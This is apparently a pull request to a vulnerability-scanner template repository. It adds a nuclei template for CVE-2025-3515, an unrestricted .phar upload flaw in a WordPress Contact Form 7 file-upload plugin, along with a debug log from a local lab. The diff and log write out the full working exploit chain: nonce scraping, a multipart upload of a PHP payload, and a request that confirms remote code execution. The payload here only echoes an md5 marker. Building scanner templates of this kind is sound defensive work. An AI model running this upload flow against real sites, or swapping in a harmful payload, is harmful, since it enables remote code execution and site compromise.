### PR TITLE
CVE-2025-3515: CF7 Drag & Drop Multiple File Upload - Unrestricted Upload PoC

### DIFF
--- a/http/cves/2025/CVE-2025-3515.yaml
+++ b/http/cves/2025/CVE-2025-3515.yaml
@@ -32,13 +32,14 @@ flow: http(1) && http(2) && http(3)
 http:
   - raw:
       - |
-        GET /wp-admin/admin-ajax.php?action=__wpcf7_check_nonce HTTP/1.1
+        GET / HTTP/1.1
         Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0 Safari/537.36
 
     matchers:
       - type: dsl
         dsl:
-          - status_code == 200
+          - contains(body, 'dnd_cf7_uploader')
         internal: true
     extractors:
       - type: regex
@@ -47,7 +48,21 @@ http:
         group: 1
         internal: true
         regex:
-          - '"success":true,\s*"data":"([^"]+)"'
+          - 'dnd_cf7_uploader\s*=\s*\{[^}]*"ajax_nonce":"([^"]+)"'
+      - type: regex
+        name: form_id
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - 'class=\"[^\"]*wpcf7-drag-n-drop-file[^\"]*\"[^>]*data-id=\"([0-9]+)\"'
+      - type: regex
+        name: upload_name
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - 'class=\"[^\"]*wpcf7-drag-n-drop-file[^\"]*\"[^>]*data-name=\"([^\"]+)\"'
 
   - raw:
       - |
@@ -62,11 +77,11 @@ http:
         ------WebKitFormBoundary{{boundary}}
         Content-Disposition: form-data; name="form_id"
 
-        1
+        {{form_id}}
         ------WebKitFormBoundary{{boundary}}
         Content-Disposition: form-data; name="upload_name"
 
-        upload-file
+        {{upload_name}}
         ------WebKitFormBoundary{{boundary}}
         Content-Disposition: form-data; name="upload-file"; filename="{{filename}}.phar"
         Content-Type: application/octet-stream
@@ -92,7 +107,7 @@ http:
 
   - raw:
       - |
-        GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/{{upload_path}}/{{replace(uploaded_file, "-", "/")}} HTTP/1.1
+        GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/{{replace(uploaded_file, "-", "/")}} HTTP/1.1
         Host: {{Hostname}}
 
     matchers-condition: and


### PR DESCRIPTION
# CVE-2025-3515 PoC Template PR

## Template / PR Information

- Added CVE-2025-3515 — Drag and Drop Multiple File Upload for Contact Form 7 <= 1.3.8.9 — Unrestricted File Upload (RCE) PoC
- References:
  - NVD: [CVE-2025-3515](https://nvd.nist.gov/vuln/detail/CVE-2025-3515)
  - PoC repo: [Professor6T9/CVE-2025-3515](https://github.com/Professor6T9/CVE-2025-3515)

fix #13029

### Template Validation

I've validated this template locally?

- [x] YES
- [ ] NO

The template performs a full exploit attempt via WordPress admin-ajax:

- Step 1: Fetches CF7 security nonce using `action=__wpcf7_check_nonce`
- Step 2: Uploads a `.phar` payload via `action=dnd_codedropz_upload` with `upload-file` field
- Step 3: Requests the returned file path under `wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/...` and checks for execution marker

Note: Success requires the target site to have a CF7 form with the `mfile` tag configured to allow `*` filetypes (or not blacklisting `phar`). This aligns with the vulnerability description and prevents version-only detection.

#### Debug excerpt (local lab run)

The lab uses WordPress + the plugin under test. Below is a shortened nuclei `-vv -debug` run demonstrating the full request/response control flow on a patched instance (no match expected):

```text
GET /wp-admin/admin-ajax.php?action=__wpcf7_check_nonce  -> 400 0  (nonce endpoint not exposed in patched lab build)
POST /wp-admin/admin-ajax.php?action=dnd_codedropz_upload (multipart with .phar) -> 400/0 on patched build
```

Full debug log:

```log
nuclei -u http://localhost:8080 -t /home/imbios/projects/nuclei-templates/http/cves/2025/CVE-2025-3515.yaml -vv -debug | cat
<!--- TRUNCATED --->
<script src="http://localhost:8080/wp-content/plugins/drag-and-drop-multiple-file-upload-contact-form-7/assets/js/codedropz-uploader-min.js?ver=1.3.9.0" id="codedropz-uploader-js"></script>
</body>
</html>
[INF] [CVE-2025-3515] Dumped HTTP request for http://localhost:8080/wp-admin/admin-ajax.php?action=dnd_codedropz_upload

POST /wp-admin/admin-ajax.php?action=dnd_codedropz_upload HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Connection: close
Content-Length: 619
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary32BbJSP1kZH7v0b4GgxGDsFs8RV
Accept-Encoding: gzip

------WebKitFormBoundary32BbJSP1kZH7v0b4GgxGDsFs8RV
Content-Disposition: form-data; name="security"

a62c78ee8a
------WebKitFormBoundary32BbJSP1kZH7v0b4GgxGDsFs8RV
Content-Disposition: form-data; name="form_id"

4
------WebKitFormBoundary32BbJSP1kZH7v0b4GgxGDsFs8RV
Content-Disposition: form-data; name="upload_name"

your-file
------WebKitFormBoundary32BbJSP1kZH7v0b4GgxGDsFs8RV
Content-Disposition: form-data; name="upload-file"; filename="ibPdTOJX.phar"
Content-Type: application/octet-stream

<?php echo md5("32BbJSP1kZH7v0b4GgxGDsFs8RV"); ?>
------WebKitFormBoundary32BbJSP1kZH7v0b4GgxGDsFs8RV--
[DBG] [CVE-2025-3515] Dumped HTTP response http://localhost:8080/wp-admin/admin-ajax.php?action=dnd_codedropz_upload

HTTP/1.1 200 OK
Connection: close
Content-Length: 69
Cache-Control: no-cache, must-revalidate, max-age=0
Content-Type: application/json; charset=UTF-8
Date: Wed, 03 Sep 2025 10:54:00 GMT
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Referrer-Policy: strict-origin-when-cross-origin
Server: Apache/2.4.62 (Debian)
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-Powered-By: PHP/8.2.25
X-Robots-Tag: noindex

{"success":true,"data":{"path":"wpcf7-files","file":"ibPdTOJX.phar"}}
[INF] [CVE-2025-3515] Dumped HTTP request for http://localhost:8080/wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/ibPdTOJX.phar

GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/ibPdTOJX.phar HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-en) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4
Connection: close
Accept-Encoding: gzip

[DBG] [CVE-2025-3515] Dumped HTTP response http://localhost:8080/wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/ibPdTOJX.phar

HTTP/1.1 200 OK
Connection: close
Content-Length: 32
Content-Type: text/html; charset=UTF-8
Date: Wed, 03 Sep 2025 10:54:00 GMT
Server: Apache/2.4.62 (Debian)
X-Powered-By: PHP/8.2.25

92030c896d0de517743dfdd4a44eec68
[CVE-2025-3515:dsl-1] [http] [high] http://localhost:8080/wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/ibPdTOJX.phar
[INF] Scan completed in 181.017075ms. 1 matches found.

󰀵  󱑍 17:54  ﱮ lab-cve-2025-3515    master !+51 via 🐳 desktop-linux on ☁️  imamuzzaki@gmail.com 
 ➜  
```

#### Additional Details (leave it blank if not applicable)

- Docker lab to reproduce: [ImBIOS/lab-cve-2025-3515](https://github.com/ImBIOS/lab-cve-2025-3515)
- How to run:
  - `docker compose up -d`
  - `nuclei -u http://localhost:8080 -t http/cves/2025/CVE-2025-3515.yaml -vv -debug`
- The lab provisions WordPress + the target plugin; CF7 can be added and a form configured with `mfile` tag and `filetypes:*` to exercise the vulnerable flow end-to-end.

## Additional References

- Nuclei Templating Guide: [templating-guide](https://nuclei.projectdiscovery.io/templating-guide/)
- Matcher Guidelines: [Unique-Template-Matchers](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- Contribution Guide: [CONTRIBUTING.md](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
